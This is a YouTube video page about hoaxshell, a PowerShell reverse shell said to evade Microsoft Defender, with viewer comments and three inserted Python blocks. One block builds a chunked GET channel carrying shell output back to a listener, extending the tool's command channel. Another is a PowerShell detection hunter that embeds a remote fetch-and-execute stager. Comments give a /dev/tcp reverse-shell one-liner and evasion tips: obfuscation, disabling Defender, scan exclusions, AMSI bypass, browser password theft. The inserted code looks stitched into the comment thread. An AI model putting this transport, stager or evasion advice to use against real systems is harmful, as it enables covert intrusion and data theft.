
Reverse Shell UNDETECTED by Microsoft Defender (hoaxshell) 

John Hammond
161K views

j-h.io/plextrac SUPER thankful for PlexTrac for supporting the channel and sponsoring this video -- try their premier reporting & collaborative platform in a FREE one-month trial! Spend more time hacking, and less time reporting 😎
Help the channel grow with a Like, Comment, & Subscribe!
❤️ Support ➡ j-h.io/patreon ↔ j-h.io/paypal ↔ j-h.io/buymeacoffee
Check out the affiliates below for more free or discounted learning!
🖥️ Zero-Point Security ➡ Certified Red Team Operator j-h.io/crto
💻Zero-Point Security ➡ C2 Development with C# j-h.io/c2dev
🐜Zero2Automated ➡ Ultimate Malware Reverse Engineering j-h.io/zero2auto
🐜Zero2Automated ➡ MISP & Malware Sandbox j-h.io/zero2auto-sandbox
⛳Point3 ESCALATE ➡ Top-Notch Capture the Flag Training j-h.io/escalate
👨🏻‍💻7aSecurity ➡ Hacking Courses & Pentesting j-h.io/7asecurity
📗Humble Bundle ➡ j-h.io/humblebundle
🐶Snyk ➡ j-h.io/snyk
🤹‍♀️SkillShare ➡ j-h.io/skillshare
🌎Follow me! ➡ j-h.io/discord ↔ j-h.io/twitter ↔ j-h.io/linkedin ↔ j-h.io/instagram ↔ j-h.io/tiktok
📧Contact me! (I may be very slow to respond or completely unable to)
🤝Sponsorship Inquiries ➡ j-h.io/sponsorship
🚩 CTF Hosting Requests ➡ j-h.io/ctf
🎤 Speaking Requests ➡ j-h.io/speaking
💥 Malware Submission ➡ j-h.io/malware
❓ Everything Else ➡ j-h.io/etc

Published: 10 Oct 2022

Comments: 309
@HaxorTechTones · 1 year ago
Thank you from the heart for making this, John! Heads up for the people watching this: hoaxshell's payload won't work in constrained language mode due to the method invocation error. The shell is actually established, but as it utilizes POST requests to send each command's output back to the attacker, it gets cut off. It could work (in theory) if the output was sent back to the attacker via GET, which of course would require modifying the tool and finding a workaround for the limited number of characters that can be transferred within a URL.
@NahImPro · 1 year ago
This is awesome, to have the provider of this script comment on your channel, John. You're awesome, man, you motivate me daily.
@centdemeern1 · 1 year ago
Would you be able to put some of the stuff that doesn't fit into the URL into a header?
@HaxorTechTones · 1 year ago
@centdemeern1 You could, although I believe the best approach would be to split the cmd output into multiple GET requests (if output.length > 2064) and notify the hoaxshell server accordingly to combine a number of GET requests, e.g. via a custom header like "X-Combine: 5" or whatever. There's actually an unlimited amount of awesome things you could do by enriching the PowerShell payload, but the length of it is a major issue. I tried to keep the payloads generated by hoaxshell as short and compact as possible.
@centdemeern1 · 1 year ago
@HaxorTechTones I see, that makes sense. Maybe something like this could be a command line flag (e.g. --constrained-language-mode) with a warning that it'll make the payload larger. If not, maybe I'll fork it or something. If I feel like it. Who knows.
@HaxorTechTones · 1 year ago
@centdemeern1 Yeah, I was actually thinking of adding exactly that in the next update.
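The chunk-and-reassemble transport sketched in the thread above, as an added example written for this page rather than hoaxshell's own code: the agent side splits a command's output into as many GET requests as fit under a URL budget, tags each with a sequence number and an X-Combine header carrying the part count, and the listener side stitches the parts back together, whatever order they arrive in. The endpoint path, the query parameter names (s, i, d), the session id and the 2064-character budget quoted in the thread are all assumptions made for the example.

```python
from __future__ import annotations

import base64
import math
from urllib.parse import parse_qs, urlencode, urlparse

MAX_URL_LEN = 2064   # assumed per-request budget, the figure quoted in the thread
ENDPOINT = "/"       # hypothetical path the agent requests on the listener


def _b64url(data: bytes) -> str:
    # base64url without padding uses only [A-Za-z0-9-_], which urlencode()
    # leaves untouched, so a chunk's length is exactly what lands in the URL.
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def build_requests(session_id: str, output: str) -> list[tuple[str, dict[str, str]]]:
    """Agent side: the (path, headers) of every GET needed to ship `output`."""
    data = _b64url(output.encode("utf-8"))
    # Fixed per-request overhead: path, "?", and the query with an empty chunk.
    # The index is zero-padded so its width is the same in every request.
    overhead = len(ENDPOINT) + 1 + len(urlencode({"s": session_id, "i": "0000", "d": ""}))
    chunk_size = MAX_URL_LEN - overhead
    total = max(1, math.ceil(len(data) / chunk_size))
    requests = []
    for idx in range(total):
        chunk = data[idx * chunk_size:(idx + 1) * chunk_size]
        path = ENDPOINT + "?" + urlencode({"s": session_id, "i": f"{idx:04d}", "d": chunk})
        assert len(path) <= MAX_URL_LEN
        requests.append((path, {"X-Combine": str(total)}))
    return requests


class Reassembler:
    """Listener side: buffers chunks per session and returns the complete
    output once all X-Combine parts have arrived; None until then."""

    def __init__(self) -> None:
        self._parts: dict[str, dict[int, str]] = {}

    def handle(self, path: str, headers: dict[str, str]) -> str | None:
        qs = parse_qs(urlparse(path).query, keep_blank_values=True)
        session_id = qs["s"][0]
        idx = int(qs["i"][0])
        total = int(headers.get("X-Combine", "1"))
        parts = self._parts.setdefault(session_id, {})
        parts[idx] = qs["d"][0]
        if len(parts) < total:
            return None
        data = "".join(parts[i] for i in range(total))
        del self._parts[session_id]
        return _unb64url(data).decode("utf-8")


def roundtrip(output: str) -> tuple[int, str | None]:
    """Ship `output` through build_requests() and a Reassembler, delivering the
    parts in reverse order; returns the request count and the rebuilt text."""
    requests = build_requests("s3ss10n", output)
    listener = Reassembler()
    result = None
    for path, headers in reversed(requests):
        result = listener.handle(path, headers)
    return len(requests), result


if __name__ == "__main__":
    count, text = roundtrip("line of output\n" * 400)   # constructed sample, 6 KB
    print(f"{count} requests, reassembled {len(text or '')} characters")
```

Percent-encoding is what makes a naive split fail: raw output expands unpredictably once spaces, quotes and non-ASCII bytes are escaped, which is why the example base64url-encodes first and budgets on the encoded length. Nothing here is signed or encrypted, so the listener must still bind the session id to something the agent cannot guess if it is ever exposed beyond a lab.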
@jxberrios · 1 year ago
John, you have NO idea how long I've been trying different mechanisms unsuccessfully, and after watching this I decided to try it out... and dude!!! This tool is definitely amazing!!
@MsRebel411 · 1 year ago
Just found this channel last week and I'm loving it...
@lucawills · 1 year ago
Thanks so much John! This worked really well for me on an HTB machine where the Windows machine had an AV that blocked all reverse shells I tried, except for the one shown in this video! Works amazingly :)
@PostMeridianLyf · 1 year ago
I am 1000% addicted to your content! Please keep this coming, my brain is in love with you!
@cirklare · 1 year ago
You are right, PlexTrac is making a difference in the reporting process. My first report at hacker1 was about an open redirect in Grab (the Asian version of Uber). With PlexTrac you can report in 15 minutes instead of 2 hours to get them to your point and explain what you did.
@realelaverick · 1 year ago
I think the problem you're getting with the base64 decode is that it is encoded in UTF-16 but the Linux base64 -d command decodes to ASCII.
@TheMAZZTer · 1 year ago
Probably encoded UTF-8, since it only encounters problems with one or two characters, it seems. UTF-8 is compatible with ASCII until you use characters not in ASCII, which get encoded as double width or wider. Possibly Sublime detected the resulting file as UTF-8 when ASCII would have been better, or something. Difficult to know exactly where things screwed up.
@handlemchandleson1 · 1 year ago
❌He doesn't copy all of the B64 at 11:00 lol, that's why❌ Edit: nah, nvm
@beyondcatastrophe_ · 1 year ago
@handlemchandleson1 Not true. Also, he's pasting there. If the base64 string was incomplete, there wouldn't be the == at the end.
@LouisSerieusement · 1 year ago
@beyondcatastrophe_ He forgot the first line at the top.
@JeffNoel · 1 year ago
@handlemchandleson1 He doesn't use the pasted content though when he tries to select it within the payload.b64 file. He directly specifies base64 -d payload.b64 (which contains the full payload) instead of doing an echo "PasteStringHere" | base64 -d.
@Rojawa · 1 year ago
As a German, I have to admit... the X at 05:30 is SUS.
@hctiBelttiL · 1 year ago
It's left-handed, as opposed to what you're referring to. Probably a stylized Hindu sauwastika. It's also a character in Chinese and Japanese script, or it could be something else entirely. Aliens? Tire burns for monster trucks? The possibilities are endless!
@user-fq6ti2fg9n · 19 days ago
I love the way you break things down 👍 in all your videos. Continue your hard work.
@_hackwell · 1 year ago
Awesome! I'll use it on my next boxes for sure.
@davidnagy4723 · 1 year ago
Hi John. As t3l3machus showed in one of his vids, hoaxshell actually still works with minimal modification to the base payload and goes through some free AVs too.
@DarkFaken · 1 year ago
Hey John, have you had a look at the cmdlet New-Module? I came across it today in the documentation; apparently it allows for creating script blocks in memory. Wondering if that would work similarly to iex.
@G-33k · 1 year ago
Only 2 guys are my favorites in the tech field on YouTube, John Hammond & David Bombal.
@rafag9129 · 1 year ago
You're forgetting @ippsec
@brandonevans5123 · 1 year ago
and LiveOverflow!
@48pluto · 1 year ago
@ippsec is probably not human LOL, but certainly my best source into ethical hacking.
@JustinBarfitt · 1 year ago
Yeah, you can definitely replace Bombal from that list for a quality cyber sec channel... IPPSEC, HackerSploit, The Cyber Mentor, etc.
@MrDaveUsesWords · 1 year ago
No love for @jackrhysider?
@Lampe2020 · 1 year ago
5:00 This commentary on the code is just hilarious!
@chrisfahie2767 · 1 year ago
It's working, thanks my friend.
@jakepanda209 · 1 year ago
Hi John, how are you, after a very long time watching your video? Amazing content, thank you.
@chrisfahie2767 · 1 year ago
Worked, thanks a lot!
@otakusong66 · 1 year ago
You're really good at explaining, thank you.
@tiktoknesia3657 · 1 year ago
This exertion hella good! Recommended.
@khaelkugler · 11 months ago
Hey John! Cool video. I do some red teaming and I'd like to know how you come across these reverse shells that bypass EDRs. Are there decent resources on the clearnet?
@zaneaussie · 1 year ago
Awesome man! Now how to get it to run on a remote machine 😛
@disdroid · 1 year ago
So presumably you would have control of the router and use that to deliver the payload and open a port for remote access, but you still need to execute the PowerShell command on the target.
@geroffmilan3328 · 1 year ago
Executing code on a target is a trivial task, given the multitude of delivery methods ranging from phishing through web-based scripts to USB disks or keyboard impersonators. If you can block all of those (and in theory it's not a bad idea) you'll end up in practice with a very limited-use computer, which might as well be running a RISC-based CPU & OS if it can still do its intended job in this state.
@RAJA-di5qj · 1 year ago
Thanks teacher ji🇮🇳💫
@plasmasupremacy9321 · 1 year ago
A bit of a silly comment, but the way your lighting is set up casts shadows from your glasses that look kinda like winged eyeliner. And honestly, slay dude, you look great, haha.
@fastmot1on · 1 year ago
You could probably edit that payload to ensure it grabs the system proxy settings and uses them; this way it should be usable from within enterprise networks.
@elllieeeeeeeeeeeeeeeeeeeeeeeee
Enterprise networks probably would have a firewall.
@Spelter · 1 year ago
@elllieeeeeeeeeeeeeeeeeeeeeeeee True, and a connection to port 80 instead of 8080 will be tunneled through the proxy, maybe 443 with SSL, and the firewall is not set up to decrypt the stream to inspect it. Could work; good enterprise networks do SSL inspection, but only if the host has not set up security measures like Google or Microsoft do. The problem is, like it always was, bringing the code into a system and executing it. You can't send a ps1 file and say "hey, here is a patch", because by default script execution is disabled and a warning pops up. You can send an exe file which starts a PowerShell process in the background, but how do you get your app to your victim? Still, a nice tool to know.
@geroffmilan3328 · 1 year ago
@elllieeeeeeeeeeeeeeeeeeeeeeeee Proxies exist to allow firewall bypass for specific protocols. Users are often restricted in terms of what they can access via the proxy, usually based on categories defined by the proxy vendor, unless the company chooses to micromanage on a per-URL basis. Admins, however, often have way fewer restrictions, and are a more valuable target anyway. The solution is threat hunting: someone must ensure logs are gathered from the end user devices, proxies, firewalls, switches & every other element in the chain, then build alerts and actions based on content found across all of those log types.
@aymaneelhadi2954 · 1 year ago
Hey man, it works great and without any problems.
@idrissasow1595 · 1 year ago
This tutorial is amazing and you are really good at teaching!! Great job sir!
@purplesprout5774 · 1 year ago
Great content John, I'd be interested as well in seeing how that looks from a threat hunting / defender PoV: how could I detect it, spawned processes, event logs, dropped files etc. If I had Sysmon running, what could I see in a SIEM?
@purplesprout5774 · 1 year ago
Should have said, alerting on obfuscated PowerShell in a SIEM would have detected that it ran.
@abdullahyasin3055 · 1 year ago
Probably that powershell -e payload under a powershell process; we can hunt for that in Sysmon.
@agsystems8220 · 1 year ago
@purplesprout5774 It would, but in the real world it probably wouldn't be obfuscated. It would be casually placed somewhere in a 'utility' that does something else. The code block that is running on the Windows machine is so simple that it probably almost exists in the wild for legitimate limited reasons. A legitimate app would not be a raw running of an expression fetched from somewhere, but it may parse some data from somewhere into part of an expression and run that. This still seems like a bad idea, because if the parsing can be escaped it becomes a shell, but that doesn't mean it isn't done. The problem is that this simple demonstration is not the real problem (though script kiddies will abuse it). More of an issue is deliberately weak parsing in an otherwise functional application involving Invoke-Expression. Preventing the use of Invoke-Expression on retrieved data would not be backward compatible, while detecting buggy parsing is 'hard' due to parsing being a Turing-complete problem. This demonstrates that any use of Invoke-Expression on data retrieved from a remote server is potentially a reverse shell. At best it is an attack surface, at worst a deliberate backdoor. I guess you could go through the uses of Invoke-Expression and try to characterise and whitelist legitimate ones. Automated detection is extremely hard though, due to 'doing anything' being Invoke-Expression working as intended.
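One way to do the hunt the thread above describes, as an added example written for this page (not code from the video, from hoaxshell, or from any SIEM vendor): score process-creation command lines of the kind Sysmon Event ID 1 reports, decode any -EncodedCommand blob (PowerShell expects base64 over UTF-16LE there), and surface lines whose decoded body fetches and evaluates remote content. The sample command lines are constructed for the example, the encoded one is generated inside the block rather than copied from any tool, the token weights and the threshold are arbitrary choices, and 10.0.0.5 is a placeholder address.

```python
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass, field

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the spellings
# below are the ones that show up most often in telemetry.
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})"
)

# Tokens that raise the score when found in the command line or its decoded
# body. The weights are arbitrary choices for this example.
SUSPICIOUS = {
    "invoke-expression": 3, "iex": 3, "downloadstring": 3,
    "net.webclient": 2, "invoke-webrequest": 2, "iwr": 2,
    "invoke-restmethod": 2, "irm": 2,
    "-nop": 1, "hidden": 1, "bypass": 1,
}
ENCODED_WEIGHT = 2   # an encoded command is itself worth a second look


@dataclass
class Finding:
    command_line: str
    decoded: str | None
    score: int
    hits: list[str] = field(default_factory=list)


def decode_powershell_b64(b64: str) -> str | None:
    """-EncodedCommand is base64 over UTF-16LE; anything else is not a valid blob."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_command_line(cmdline: str) -> Finding:
    decoded = None
    searchable = cmdline
    match = ENCODED_FLAG.search(cmdline)
    if match:
        decoded = decode_powershell_b64(match.group(1))
        # Drop the blob itself so its random-looking characters cannot
        # coincidentally match a token; search the decoded body instead.
        searchable = cmdline.replace(match.group(1), "") + " " + (decoded or "")
    lowered = searchable.lower()
    hits = [token for token in SUSPICIOUS if token in lowered]
    score = sum(SUSPICIOUS[t] for t in hits) + (ENCODED_WEIGHT if match else 0)
    return Finding(cmdline, decoded, score, hits)


def hunt(command_lines, threshold: int = 5) -> list[Finding]:
    """Findings at or above the threshold, highest score first."""
    findings = [score_command_line(line) for line in command_lines]
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)


# Constructed samples standing in for Sysmon Event ID 1 CommandLine values.
# The second one is built here: a hidden, no-profile launch whose encoded body
# fetches a page and hands it to iex, the shape of a web-delivered stager.
_STAGER = "iex (iwr http://10.0.0.5:8080/ -UseBasicParsing).Content"
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell -nop -w hidden -e "
    + base64.b64encode(_STAGER.encode("utf-16-le")).decode("ascii"),
    r'"C:\Program Files\App\app.exe" --service',
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_COMMAND_LINES):
        print(finding.score, finding.hits)
        print("  ", finding.decoded or finding.command_line)
```

The scheduled backup script in the first sample still scores (it uses -NoProfile and an execution-policy bypass, which are exactly what the commenter above means by legitimate use looking similar), but it stays under the threshold because nothing in it fetches or evaluates remote content; the point of decoding the blob is that the interesting tokens are only visible after decoding.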
@franciscovasquez6566 · 1 year ago
Hoaxshell was able to bypass Elastic Endpoint. I am pleased lol.
@ThinhNguyen-lc2py · 1 year ago
Hi John, love all the content you created. I'm learning cyber; still finding a new laptop to work on. Do you have any advice? May I ask what your device specifications are? Best
@slybandit8117 · 1 year ago
This was cool, but in less than 7 months Windows has made a patch for this. My newly created Win11 VM, with no updates AND most of Defender turned off, was catching it. You must keep Real-Time Protection off (that's the only time I got a rev shell), but it keeps turning itself back on now. I am updating the VM and I am going to try them again. Thanks for the vid! Awesome as always!
@BrickTamlandOfficial · 1 year ago
7 months lol, is that supposed to be a brag about Windows security? lol
@outcome2715 · 4 months ago
Easy to bypass: give it instructions to launch a user-level command prompt in the background (so the user doesn't see), obfuscate your new code so AV doesn't pick up on the command prompt command, inject it into a legit application (plenty of ways) and you're good to go.
@slybandit8117 · 4 months ago
@outcome2715 Cool. Thanks for the tips. You make it sound easy; I'll have to try a little harder.
@slybandit8117 · 4 months ago
@BrickTamlandOfficial No. If anything, the opposite. But no, that's not at all why I said that. It was literally just the time that it was working, then not.
@torsec6048 · 1 year ago
Nice John, this is the main reason you're my most fav YouTube content creator.
@Cossaw · 1 year ago
I saw this from you first! Good stuff.
@torsec6048 · 1 year ago
@Cossaw Thanks mate, but John Hammond is great, all his videos are on a whole different level.
@myfirsthak · 1 year ago
Sweet. I will try this tonight. Sadly my antivirus, Windows 10 Defender, catches it, but try the ducky script I posted, it still works.
@himashhimash6017 · 1 year ago
After Havoc C2... good one.
@spoon0r · 1 year ago
Been using this for a while. It's really nice, my go-to quick Windows shell.
@austinmurphy9074 · 1 year ago
rip, about to not work anymore lol
@reynaldo7371 · 1 year ago
Tried hoaxshell last month from a Kali VM to my main PC with Avast Premium Security enabled and updated. It freaked me out that Avast didn't detect anything, Windows Defender neither.
@elllieeeeeeeeeeeeeeeeeeeeeeeee
Avast sucks.
@reynaldo7371 · 1 year ago
@elllieeeeeeeeeeeeeeeeeeeeeeeee Got it for cheap, still better than Windows Defender I guess.
@reynaldo7371 · 1 year ago
@Fsociety I see what you mean, but... I know I won't let any stranger go inside my house; what I can do is at least lock the door.
@hypedz1495 · 1 year ago
John.. John Hammond. Good content 👏
@filipomazic8823 · 1 year ago
I think your b64 was weird because by default it uses UTF-8 and yours was encoded with UTF-16 by hoaxshell, it seems. Let me know if I'm wrong. Awesome vid btw.
@OneOfThePetes · 1 year ago
Man, your hair grew quickly!
@danielniedzwiecki638 · 1 year ago
As always, everything is super. Waiting for new cheats from your side.
@profexer · 1 year ago
No threat actors really use a single reverse shell in the wild. But it's good to see WD and other AVs get bypassed from time to time 😏
@PhotoSlash · 1 year ago
Update: it does get blocked by AV now.
@tom-on · 1 year ago
ngl the x in the logo do be looking kinda sus
@lancemarchetti8673 · 1 year ago
Brilliant 👏
@ciloksejati4154 · 1 year ago
wow, discussed here 👍
@swifty010 · 9 months ago
lol, watching a JH vid with a JH ad, never seen this before.
@yashprasad2639 · 1 year ago
People don't understand that Windows Defender might be bad, but it does one thing that is really helpful: it tells us that an app is signed by a valid company, and if an app doesn't have a signature by a renowned company it's a really big red flag.
@justfuture6585 · 1 year ago
Great video as always.
@abepl · 1 year ago
Where should I start if I wanna get into pentesting (apart from experimenting myself)?
@prabhatjoshi602 · 1 year ago
I did try to replicate this and found out that this works only when the Defender toolkit isn't installed on the system. Mine was Win 11 Enterprise eval edition, similar to John's, and I saw that I needed to install a toolkit of some kind from Windows Update in Settings for Defender to start working. Maybe John's system didn't have that installed and so it bypassed it gracefully.
@draugh1r219 · 1 year ago
Now the question is how many systems have it?
@prabhatjoshi602 · 1 year ago
@draugh1r219 Yup, that is also true.
@hackximus · 1 year ago
Unfortunately, it is already detected by Sophos AV. Three weeks ago it was still working. Unfortunately, it's already too well known. It is only a matter of time before Windows Defender will detect the reverse shell. But cool project.
@syskey1402 · 1 year ago
Yea, but if you modify the source code only a little and also obfuscate it in layers, maybe it could still bypass.
@mentor_bajrami · 1 year ago
Unfortunately?
@hackximus · 1 year ago
@syskey1402 The problem is that many who watch John do not have the experience to analyze or read code and change it so that it then works. I fully agree with you that the change is not detected by the Sophos AV. Weekend task for me. 😜
@syskey1402 · 1 year ago
@hackximus lol, yes
@henryd4968 · 1 year ago
Hi, I am new to the topic and wanted to ask if it is theoretically possible to also not use his IP address for this but something else, like a server?
@salman-si7me · 1 year ago
Great video, very well explained. Unfortunately two devices of mine are corrupted: hard disk errors, permissions, and the system keeps taking ownership! This is because PowerShell scripts are running automatically + unrestricted policy; the BIOS is configured, WiFi as well. I can't connect again with my new device to my WiFi due to PowerShell and Kali being linked. If anyone has any ideas I would really appreciate it.
@feloxes · 1 year ago
You can bypass AMSI and then do Mimikatz.
@wtfdoiputhere · 1 year ago
I remember in Windows 10 I made a batch script that automatically ran as administrator so I could use PowerShell commands to download the payload from my server and exclude.exe from being scanned.
@olivermejia3786 · 1 year ago
Great idea
@wtfdoiputhere · 1 year ago
@olivermejia3786 I was honestly shocked how simple and effective it was; I even wrote a blog about it.
@outlawnation5160 · 1 year ago
@wtfdoiputhere exclude.exe?
@wtfdoiputhere · 1 year ago
@outlawnation5160 Yes, using PowerShell commands you could tell Windows Defender to exclude certain folders or file types from being scanned.
@outlawnation5160 · 1 year ago
@wtfdoiputhere That's pretty powerful (no pun intended). Do you have a GitHub for the script?
@spelz1751 · 1 year ago
AV picked it up real quick. Perhaps it has already been registered by Defender as a threat.
@Gh0st_0723 · 1 year ago
Yup, but disabling it can be a part of the script.
@mcmaly86 · 1 year ago
YO THANK YOU SO MUCH
@user-qc5hd6ih7q · 1 year ago
One question: does the Windows machine have to be on the same network? I'm new in this area :)
@crimsonmoon9404 · 1 year ago
It's only a matter of time before more are found.
@Riborwahz · 1 year ago
Great one
@caleboleary182 · 1 year ago
John from the future has great hair.
@atsekbatman · 1 year ago
Nice little video!
@techeater4051 · 1 year ago
This is sick!
@Yadav-it3ku · 1 year ago
Hello @John Hammond sir, I've tried hoaxshell many times but it's not working... Can you check this out and please provide the solution? Every time I run the reverse shell, Defender detects the payload as malicious and throws an error.
@ThePowerRanger · 1 year ago
Seems like Windows needs to get its security up.
@hballouz · 10 months ago
In the video LAN IP addresses are used; what IP should be used if the payload is run on a computer outside my network? Is it my public IP?
@ggdgfd9392 · 1 year ago
Just simply put in the code, it works! Thanks!
@jondoe79 · 1 year ago
Payload is encoded in base16.
@rsvv6828 · 1 year ago
Can we use PlexTrac for an OSCP report?
@Panda-wi9vf · 1 year ago
Looks like that Windows supporter watched your video. When cloud protection is on, Havoc's demon gets flagged as a trojan 🤣🤣🤣
@rpmathur1278 · 3 months ago
Can it work over the internet if we place a Cloudflare URL in place of the IP address?
@UsamaAli-kr2cw · 1 year ago
I tried this one week before and it didn't work. The box had Deep Security enabled; I disabled the Deep Security agent, and Windows Defender was already disabled prior to my testing, but it still didn't work.
@harryjazon7734 · 1 year ago
Does Kali proxychains work on VirtualBox?
@JNET_Reloaded · 1 year ago
Nice, this is my fav vid of the year!
@Nexus_Programming · 1 year ago
very awesome
@KamKam-ym3do · 1 year ago
There are three on my computer. They won't go away: contebrew, trickbot, "systen32" (not system, systen).
@Silencer1337 · 1 year ago
I fail to see what's there to detect about this. A user opening PowerShell and executing a malicious command is his problem, no?
@smokingone · 1 year ago
Did you run PowerShell as an administrator? If so, I don't see this software having any practical use besides possibly diagnostics. If you don't need an admin shell on the Windows machine, then it would be possible to write an autoexec.bat file and put it on a USB, and then all it would take is a few moments of access to the machine, assuming the owner didn't disable autorun.
@wouter2754 · 1 year ago
No PowerShell needed, I think.
@oproadiakdajdbhjadajsld · 1 year ago
Doesn't work anymore. Tested on a fully updated Win 11 machine (28/10/22).
@exeplays7212 · 1 year ago
That x is looking kinda SUS
@user-pb5tt7zu9g · 10 months ago
Hello everyone, I cannot run the hoaxshell listener on the newest Ubuntu, it gives the error "No module named 'gnureadline'". New Python does not support gnureadline. How can I fix this, or how can I use hoaxshell on the newest Linux system?
@codewithraiju1424 · 1 year ago
We can find a few reverse shells, if we search a little, that can bypass Win Defender. The hard part is finding a RAT with RDP.
@Bruh-sp2bj · 1 year ago
What do you need RDP for? Just use the system shell.
@codewithraiju1424 · 1 year ago
@Bruh-sp2bj Yeah. But there is a swag of RDP. With a shell we can do a lot, but with RDP we can even get passwords stored in the browser of a victim.
@realavdhut · 1 year ago
@codewithraiju1424 bruh? If you have a shell then just download the saved passwords/cookies from the browser directory stored locally with the help of that shell.
@codewithraiju1424 · 1 year ago
@realavdhut Yeah, but I think they are encrypted, aren't they?
@realavdhut · 1 year ago
@codewithraiju1424 Yeah, they are... but there are different methods to retrieve it... for e.g. enum_chrome
@unam456 · 1 year ago
Do the Windows 11 core isolation and memory integrity protect against this type of attack? And if I have filtered ports, a router with firewall, NAT, antivirus and PC firewall?
@randomuser1911 · 1 year ago
Is there a way to change the port?
@shibbyshaggy · 1 year ago
Can you showcase this technique with your no-click download HTML page?
@onmc4754 · 1 year ago
I made something like this; instead of PowerShell I am using batch. Amazing to see more than one person can come up with the same idea.
@lancemarchetti8673 · 1 year ago
I also found a way to drop eee male linx and you R L's into youtube comments without the spam bots detecting it...
@witcnshum · 1 year ago
What happens if you turn off PowerShell and disable scripts in the Policy Editor, or configure the firewall to block the reverse shell?
@y.vinitsky6452 · 1 year ago
How would the firewall block it? All I would need to do is find an open port like DNS.
@witcnshum · 1 year ago
@y.vinitsky6452 Damn, can't wait for the next video, there must be an answer.
@_Slaze · 1 year ago
Should still be bypassable. But it depends on your configuration. For example, you can use unmanaged PowerShell instead of a normal powershell.exe instance.
@RemainZStudio · 1 year ago
Hi John, love your work, but there is a huge security fundamental you're not enabling, which is E3: all Windows Pro and Enterprise have these security features, they're just not enabled.... Also, are you running vanilla Windows, or what baseline are you running...? It's impossible to run a base64 code and get a shell if you do not secure Windows; first of all you need to enable Application Control and Core Isolation, this will check all files and code before executing. Also, when you run your Windows VM you need it to run for 24 hours before you do testing, as Windows will communicate with Defender cloud to check what files it needs to update in the background.
@morganguesdon2202 · 1 year ago
awesome!!
@0xC4aE1e5 · 1 year ago
I think the garbage text is ASCII, and PowerShell uses UTF-16LE.
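The encoding behind the garbled dump discussed in several comments (the base64 thread around 11:00 and the UTF-16 remarks above): PowerShell's -EncodedCommand (-e) takes base64 over UTF-16LE, so piping the blob through base64 -d on Linux prints the script with a NUL byte after every character, which looks like garbage in an editor that expected ASCII or UTF-8. This added example, written for this page and not taken from hoaxshell, builds such a blob, shows what the naive decode yields, and decodes correctly by recognising the NUL pattern; the script text is made up.

```python
import base64


def encode_for_powershell(script: str) -> str:
    """The value `powershell -EncodedCommand` expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def naive_decode(b64: str) -> str:
    """What `base64 -d` hands to the terminal: the raw bytes, NULs included."""
    return base64.b64decode(b64).decode("latin-1")


def looks_like_utf16le(raw: bytes) -> bool:
    """Heuristic: Latin-range text in UTF-16LE has a NUL in every odd byte.
    (Scripts full of CJK or emoji would defeat it, which is fine for a triage tool.)"""
    return len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])


def decode_encoded_command(b64: str) -> str:
    """Decode a blob as UTF-16LE when the byte pattern shows it, else as UTF-8."""
    raw = base64.b64decode(b64)
    if looks_like_utf16le(raw):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


# Constructed sample script and its two encodings, for comparison.
SCRIPT = "Write-Output 'hello'"
SCRIPT_UTF16_B64 = encode_for_powershell(SCRIPT)
SCRIPT_UTF8_B64 = base64.b64encode(SCRIPT.encode("utf-8")).decode("ascii")

if __name__ == "__main__":
    print(repr(naive_decode(SCRIPT_UTF16_B64)))
    print(decode_encoded_command(SCRIPT_UTF16_B64))
    print(decode_encoded_command(SCRIPT_UTF8_B64))
```

On a Linux box the equivalent one-liner is `base64 -d payload.b64 | iconv -f UTF-16LE -t UTF-8`; the Python version is here so the UTF-16LE check can be reused when triaging blobs whose origin is unknown.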
@CenterZero_DeadSecurity · 1 year ago
How would you do reverse shells from outside the LAN? Port forwarding is too much effort xd
@elllieeeeeeeeeeeeeeeeeeeeeeeee
Hamachi?
@wizz7599 · 1 year ago
Use a server that will give you a public IP (AWS, for example).
@castles990 · 1 year ago
Just use ngrok.
@sapito169 · 1 year ago
This is so good that I feel guilty just to watch it.
@catalinancutei5390 · 1 year ago
Isn't this just like you would type sh -i >& /dev/tcp/some_ip_here/some_port 0>&1 on a Linux host? I mean, of course the antivirus wouldn't block it, because it is the expected behaviour. What would then be the difference between you connecting to a reverse shell and your browser connecting to a web server? From what I know, a reverse shell vulnerability is supposed to let you gain access to a host without having physical access to it (through a public web service or something). If I'm wrong or there is something I'm missing, please correct me.
@_Slaze · 1 year ago
Windows Defender uses AMSI to detect the execution of malicious PowerShell, like a reverse shell. The point of this is, you can use the undetected reverse shell as a communication method to your C2 server like malware often does.
@catalinancutei5390 · 1 year ago
@_Slaze I see
@udotcarter · 1 year ago
How does CrowdStrike deal with this?
@demon1058 · 1 year ago
I have created a data deleter ransomware that deletes the data within your files, and you get a reverse shell after the deletion is completed, and it is undetectable. I ran the MRT scan, Malwarebytes scan, but none of them can detect it.
@shinchanstheory8002 · 1 year ago
Which language?
@zxchtl · 1 year ago
@shinchanstheory8002 Scratch
@castroonie · 1 year ago
@shinchanstheory8002 Golang
@surrender. · 1 year ago
@castroonie Golang is automatically detected by every AV as a false positive.
@demon1058 · 1 year ago
@shinchanstheory8002 Python
@svettnabb · 1 year ago
Defender without the cloud options is basically worthless.
@dadogwitdabignose · 1 year ago
The x in the video's picture looks kinda sussy.
@lancemarchetti8673 · 1 year ago
When will passwords allow for spaces and non-alphanumerics?
@y.vinitsky6452 · 1 year ago
Spaces probably never, because of how databases and database connections work. Most allow special characters and some even full Unicode.
@allies4183 · 1 year ago
Is there a way to prevent this?
@exciteproductions4two0 · 1 year ago
Doesn't work for me. Says the value must be Base64 encoded.